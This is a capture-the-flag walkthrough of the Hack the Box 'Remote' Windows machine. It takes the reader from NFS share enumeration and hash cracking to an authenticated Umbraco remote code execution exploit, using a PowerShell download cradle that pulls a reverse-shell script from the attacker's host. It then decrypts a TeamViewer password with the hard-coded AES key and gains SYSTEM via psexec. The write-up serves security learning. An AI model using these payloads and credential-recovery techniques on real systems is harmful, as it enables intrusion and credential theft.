Hack the Box: Remote

Eswar Abisheak
9 min readSep 7, 2020


What should I know in order to hack this box?

Release Date: 21-March-2020
Retire Date: 05 Sep 2020
OS: Windows
Base Points: Easy [20]
Prepared By: MrR3boot
Machine Author(s): mrb3n

What is the specialty of remote?

Remote is an easy Windows machine that features an Umbraco CMS installation. Credentials are found in a world-readable NFS share. Using these, an authenticated Umbraco CMS exploit is leveraged to gain a foothold. A vulnerable TeamViewer version is identified, from which we can recover a password. This password has been reused for the local administrator account. Using psexec with these credentials returns a SYSTEM shell.

What did I learn from this box?

  1. NFS Enumeration
  2. CMS Exploitation
  3. TeamViewer Credential Gathering
  4. SeImpersonate Privilege Abuse
  5. Mounting NFS shares

Enumeration

Nmap

I use nmap to do the work for me 😏

kali@kali:~$ nmap -sC -sV -oA scan 10.10.10.180
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-07 13:36 EDT
Nmap scan report for 10.10.10.180
Host is up (0.27s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 5m48s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-09-07T17:44:13
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 259.75 seconds

Things to look for in an Nmap scan

  1. FTP
  2. TCP
  3. SMB
  4. RPCinfo
  5. HTTP

Why only them ?

Hmm, I asked the same question, but at the end of the day these are the only listening ports on the box, so they are where I have to find clues to proceed further.

DirBuster

When you see port 80/tcp open, I go for directory brute-forcing and check all the discovered URLs for clues. I know it's a tedious process, but believe it or not, most of the time I find really important stuff.

kali@kali:~$ dirb http://10.10.10.180/

-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Sep 3 13:55:00 2020
URL_BASE: http://10.10.10.180/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.180/ ----
+ http://10.10.10.180/about-us (CODE:200|SIZE:5441)
+ http://10.10.10.180/blog (CODE:200|SIZE:5001)
+ http://10.10.10.180/Blog (CODE:200|SIZE:5001)
+ http://10.10.10.180/contact (CODE:200|SIZE:7880)
+ http://10.10.10.180/Contact (CODE:200|SIZE:7880)
+ http://10.10.10.180/home (CODE:200|SIZE:6703)
+ http://10.10.10.180/Home (CODE:200|SIZE:6703)
+ http://10.10.10.180/install (CODE:302|SIZE:126)
+ http://10.10.10.180/intranet (CODE:200|SIZE:3323)
+ http://10.10.10.180/master (CODE:500|SIZE:3420)
+ http://10.10.10.180/people (CODE:200|SIZE:6739)
+ http://10.10.10.180/People (CODE:200|SIZE:6739)
+ http://10.10.10.180/person (CODE:200|SIZE:2741)
+ http://10.10.10.180/product (CODE:500|SIZE:3420)
+ http://10.10.10.180/products (CODE:200|SIZE:5328)
+ http://10.10.10.180/umbraco (CODE:200|SIZE:5328)

Takeaway from the DirBuster scan: the site runs Umbraco CMS (note the /umbraco path).

I found three different exploits and none of them worked 😅

FTP

ftp-anon: Anonymous FTP login allowed (FTP code 230)

Let's log in to FTP with the credentials anonymous:anonymous, the usual default for anonymous access.

kali@kali:~$ ftp 10.10.10.180
Connected to 10.10.10.180.
220 Microsoft FTP Service
Name (10.10.10.180:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.

For now there are no files on the FTP server, and I couldn't upload anything either. We can ignore this service for now.

Remote Procedure Call Information

Port 111 is open, let’s enumerate it. It is running rpcbind service. The nmap scan report clearly shows rpcinfo (Remote Procedure Call Information) and list of ports along with their services. For confirmation and removal of false positive results you can use the command rpcinfo to reveal the exact running services.

Checking rpcinfo:

kali@kali:~$ rpcinfo -p 10.10.10.180
program vers proto port service
100000 2 udp 111 portmapper
100000 3 udp 111 portmapper
100000 4 udp 111 portmapper
100000 2 tcp 111 portmapper
100000 3 tcp 111 portmapper
100000 4 tcp 111 portmapper
100003 2 tcp 2049 nfs
100003 3 tcp 2049 nfs
100003 2 udp 2049 nfs
100003 3 udp 2049 nfs
100003 4 tcp 2049 nfs
100005 1 tcp 2049 mountd
100005 2 tcp 2049 mountd
100005 3 tcp 2049 mountd
100005 1 udp 2049 mountd
100005 2 udp 2049 mountd
100005 3 udp 2049 mountd
100021 1 tcp 2049 nlockmgr
100021 2 tcp 2049 nlockmgr
100021 3 tcp 2049 nlockmgr
100021 4 tcp 2049 nlockmgr
100021 1 udp 2049 nlockmgr
100021 2 udp 2049 nlockmgr
100021 3 udp 2049 nlockmgr
100021 4 udp 2049 nlockmgr
100024 1 tcp 2049 status
100024 1 udp 2049 status

Hmm, rpcinfo revealed that NFS (Network File System) and mountd services are running. OK, that's interesting.

NFS

It took me a day to learn about NFS.

To install the NFS client tools, run

sudo apt-get install nfs-common

Then I looked for exported shares and files.

kali@kali:~$ sudo showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
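Before mounting anything, the export list itself is the finding: an export advertised to everyone can be mounted by any host that can reach port 2049. The following Python, added here as an illustration and not part of the original writeup, parses showmount -e output in both the Windows-style "(everyone)" form seen above and the comma-separated Linux form, and flags exports open to everyone or *. The extra sample lines and hostnames are constructed for the demo.

```python
"""Illustration: audit a showmount -e export list for world-accessible shares."""
from dataclasses import dataclass
from typing import List

# Constructed sample. The first export line is the one from the writeup
# (Windows NFS reports "(everyone)"); the two Linux-style lines and their
# hosts are made up to show the other syntaxes.
SAMPLE_SHOWMOUNT = """Export list for 10.10.10.180:
/site_backups (everyone)
/srv/internal 10.10.0.0/16,backup.example.internal
/srv/public   *
"""

# Client specifiers that mean "any host may mount this".
WORLD_CLIENTS = {"everyone", "*"}


@dataclass
class Export:
    path: str
    clients: List[str]


def parse_showmount(text):
    """Parse showmount -e output into Export records.

    Handles both "/path (everyone)" (Windows) and "/path a,b,c" (Linux)."""
    exports = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.lower().startswith("export list for"):
            continue
        parts = line.split(None, 1)
        path = parts[0]
        raw = parts[1].strip().strip("()") if len(parts) > 1 else ""
        clients = [c.strip() for c in raw.split(",") if c.strip()]
        exports.append(Export(path, clients))
    return exports


def is_world_accessible(export):
    """True when any client entry allows every host."""
    return any(c.lower() in WORLD_CLIENTS for c in export.clients)


def audit(text):
    """Return the paths of exports that any host on the network can mount."""
    return [e.path for e in parse_showmount(text) if is_world_accessible(e)]


if __name__ == "__main__":
    for path in audit(SAMPLE_SHOWMOUNT):
        print("[!] world-accessible export:", path)
```

Running the file prints /site_backups and /srv/public; the internal export, restricted to a subnet and a named host, is left alone. Pipe real showmount output into audit() to turn an ad-hoc check into a repeatable one.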

The site_backups folder is accessible to everyone. Let’s mount this folder on our machine.

kali@kali:~$ cd backups
kali@kali:~/Desktop/backups$ strings App_Data/Umbraco.sdf | grep admin
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/password/changepassword change
User "admin" <admin@htb.local>192.168.195.1User "admin"

It contains the username admin@htb.local and a password stored as the SHA1 hash ‘b8be16afba8c314ad33d812f22a04991b90e2aaa‘. I searched for the hash on some public databases and luckily found it on crackstation.net: baconandcheese. So the login credentials are admin@htb.local : baconandcheese.

FOOTHOLD

We can log in to Umbraco CMS with the admin@htb.local / baconandcheese credentials. Clicking the Help icon in the bottom-left reveals that the version of the CMS is 7.12.4. This version suffers from an authenticated remote code execution vulnerability, for which a public exploit is available.

https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

Let’s try the github way 😄

As there is an authenticated RCE vulnerability in Umbraco 7.12.4, I searched GitHub for an Umbraco RCE exploit and its usage. I found https://github.com/noraj/Umbraco-RCE and downloaded it. Then I downloaded the PowerShell script Invoke-PowerShellTcp.ps1 from https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1, which connects back to the netcat listener on our PC. I replaced the old IP address in it with my local PC IP address and port 5555.

Exploit Execution

Invocation line added to Invoke-PowerShellTcp.ps1:

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.179 -Port 5555

Running the exploit:

kali@kali:~/Downloads/Umbraco-RCE-master$ python exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180/ -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.179/Invoke-PowerShellTcp.ps1')"

Start Python Http Server

kali@kali:~/Downloads/Umbraco-RCE-master$ sudo python3 -m http.server 80

Start NetCat Listener

kali@kali:~/Downloads/Umbraco-RCE-master$ sudo rlwrap nc -nvlp 5555
listening on [any] 5555 ...
connect to [10.10.14.179] from (UNKNOWN) [10.10.10.180] 49764
Windows PowerShell running as user REMOTE$ on REMOTE
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv>whoami
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv> cd ..
PS C:\windows\system32> cd ..
PS C:\windows> cd ..
PS C:\> ls
Directory: C:\

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/20/2020 1:13 AM ftp_transfer
d----- 2/19/2020 3:11 PM inetpub
d----- 2/19/2020 11:09 PM Microsoft
d----- 9/15/2018 3:19 AM PerfLogs
d-r--- 2/23/2020 2:19 PM Program Files
d----- 2/23/2020 2:19 PM Program Files (x86)
d----- 9/7/2020 12:05 AM site_backups
d-r--- 2/19/2020 3:12 PM Users
d----- 2/20/2020 12:52 AM Windows
PS C:\> cd users
PS C:\users> ls
Directory: C:\users

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/19/2020 3:12 PM .NET v2.0
d----- 2/19/2020 3:12 PM .NET v2.0 Classic
d----- 2/19/2020 3:12 PM .NET v4.5
d----- 2/19/2020 3:12 PM .NET v4.5 Classic
d----- 9/7/2020 1:09 AM Administrator
d----- 2/19/2020 3:12 PM Classic .NET AppPool
d-r--- 2/20/2020 2:42 AM Public
PS C:\users> cd Public
PS C:\users\Public> ls
Directory: C:\users\Public

Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 2/19/2020 3:03 PM Documents
d-r--- 9/15/2018 3:19 AM Downloads
d-r--- 9/15/2018 3:19 AM Music
d-r--- 9/15/2018 3:19 AM Pictures
d-r--- 9/15/2018 3:19 AM Videos
-ar--- 9/7/2020 1:21 AM 34 user.txt
PS C:\users\Public> type user.txt
90af1f2df661f235f22caaaa5d6df686

Hmm, that's cool, we got the user flag. Hurray!

Privilege Escalation

https://whynotsecurity.com/blog/teamviewer/

Having gained a foothold, we can now enumerate the host. Checking for running services reveals the TeamViewer service.

PS C:\> (Get-Command "C:\Program Files (x86)\TeamViewer\Version7\TeamViewer.exe").Version

In vulnerable versions, AES-128-CBC encrypted user passwords are stored in the Windows registry using the known key 0602000000a400005253413100040000 and the IV 0100010067244F436E6762F25EA8D704. Let's background the session and use the Metasploit teamviewer_passwords module to gather the credentials.

 C:\> cd HKLM:\software\wow6432node\teamviewer\version7
HKLM:\software\wow6432node\teamviewer\version7> get-itemproperty -path .

StartMenuGroup : TeamViewer 7
InstallationDate : 2020-02-20
InstallationDirectory : C:\Program Files (x86)\TeamViewer\Version7
Always_Online : 1
Security_ActivateDirectIn : 0
Version : 7.0.43148
ClientIC : 301094961
PK : {191, 173, 42, 237...}
SK : {248, 35, 152, 56...}
LastMACUsed : {, 005056B99509}
MIDInitiativeGUID : {514ed376-a4ee-4507-a28b-484604ed0ba0}
MIDVersion : 1
ClientID : 1769137322
CUse : 1
LastUpdateCheck : 1584564540
UsageEnvironmentBackup : 1
SecurityPasswordAES : {255, 155, 28, 115...}
MultiPwdMgmtIDs : {admin}
MultiPwdMgmtPWDs : {357BC4C8F33160682B01AE2D1C987C3FE2BAE09455B94A1919C4CD4984593A77}
Security_PasswordStrength : 3
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\wow6432node\teamviewer\version7
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\wow6432node\teamviewer
PSChildName : version7
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
HKLM:\software\wow6432node\teamviewer\version7> (get-itemproperty -path .).SecurityPasswordAES
255
155
28
115
214
107
206
49
172
65
62
174
19
27
70
79
88
47
108
226
209
225
243
218
126
141
55
107
38
57
78
91

After a bit of googling I found a script that does the same job as the msfconsole module:

#!/usr/bin/env python3
# Decrypts the TeamViewer 7 SecurityPasswordAES registry value.
# Requires pycryptodome: pip install pycryptodome
from Crypto.Cipher import AES

# Hard-coded key and IV shared by all vulnerable TeamViewer installs
key = b"\x06\x02\x00\x00\x00\xa4\x00\x00\x52\x53\x41\x31\x00\x04\x00\x00"
iv = b"\x01\x00\x01\x00\x67\x24\x4F\x43\x6E\x67\x62\xF2\x5E\xA8\xD7\x04"

# The 32 bytes read from (get-itemproperty -path .).SecurityPasswordAES above
ciphertext = bytes([255, 155, 28, 115, 214, 107, 206, 49, 172, 65, 62, 174,
                    19, 27, 70, 79, 88, 47, 108, 226, 209, 225, 243, 218,
                    126, 141, 55, 107, 38, 57, 78, 91])

aes = AES.new(key, AES.MODE_CBC, iv=iv)
# The plaintext is UTF-16LE, zero-padded out to the AES block size
password = aes.decrypt(ciphertext).decode("utf-16-le").rstrip("\x00")

print(f"[+] Found password: {password}")

The script output reveals the password !R3m0te!. The TeamViewer password by itself doesn't provide us with elevated access, but as the machine summary notes, it has been reused for the local administrator account.

Using psexec module in msfconsole

use exploit/windows/smb/psexec
set RHOSTS 10.10.10.180
set SMBPass !R3m0te!
set SMBUser administrator
set LHOST tun0
exploit

This is successful, and we can access the root.txt on the administrator Desktop.

Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd ..
ccd ..
C:\Windows>cd ..
ccd ..
'ccd' is not recognized as an internal or external command,
operable program or batch file.
C:\Windows>cd ..
cd ..
C:\>cd users
cd users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE23-EB3E
Directory of C:\Users

02/19/2020 04:12 PM <DIR> .
02/19/2020 04:12 PM <DIR> ..
02/19/2020 04:12 PM <DIR> .NET v2.0
02/19/2020 04:12 PM <DIR> .NET v2.0 Classic
02/19/2020 04:12 PM <DIR> .NET v4.5
02/19/2020 04:12 PM <DIR> .NET v4.5 Classic
09/07/2020 01:09 AM <DIR> Administrator
02/19/2020 04:12 PM <DIR> Classic .NET AppPool
02/20/2020 03:42 AM <DIR> Public
0 File(s) 0 bytes
9 Dir(s) 19,159,539,712 bytes free
C:\Users>cd Administrator
cd Administrator
C:\Users\Administrator>ls
ls
'ls' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\Administrator>C:\Users\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE23-EB3E
Directory of C:\Users\Administrator

09/07/2020 01:09 AM <DIR> .
09/07/2020 01:09 AM <DIR> ..
02/19/2020 04:03 PM <DIR> 3D Objects
02/19/2020 04:03 PM <DIR> Contacts
02/20/2020 03:41 AM <DIR> Desktop
02/19/2020 05:26 PM <DIR> Documents
02/23/2020 02:22 PM <DIR> Downloads
02/19/2020 04:03 PM <DIR> Favorites
02/19/2020 04:03 PM <DIR> Links
02/19/2020 04:03 PM <DIR> Music
02/19/2020 04:03 PM <DIR> Pictures
02/19/2020 04:03 PM <DIR> Saved Games
02/20/2020 01:45 AM <DIR> Searches
02/19/2020 04:03 PM <DIR> Videos
0 File(s) 0 bytes
14 Dir(s) 19,159,539,712 bytes free
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>type root.txt
type root.txt
ee7491b9fbb1a1b6f6730c4ed1de0e6a

This is how I rooted the Remote HTB machine. I learnt a lot hunting this box, and I hope you have also learnt some new things from this walkthrough. Thanks for reading this writeup. For any suggestions or queries about the walkthrough, feel free to use the comments section.


Written by Eswar Abisheak

DSCVIIT lead || https://eswar.dev || HTB player || Competitive Coding
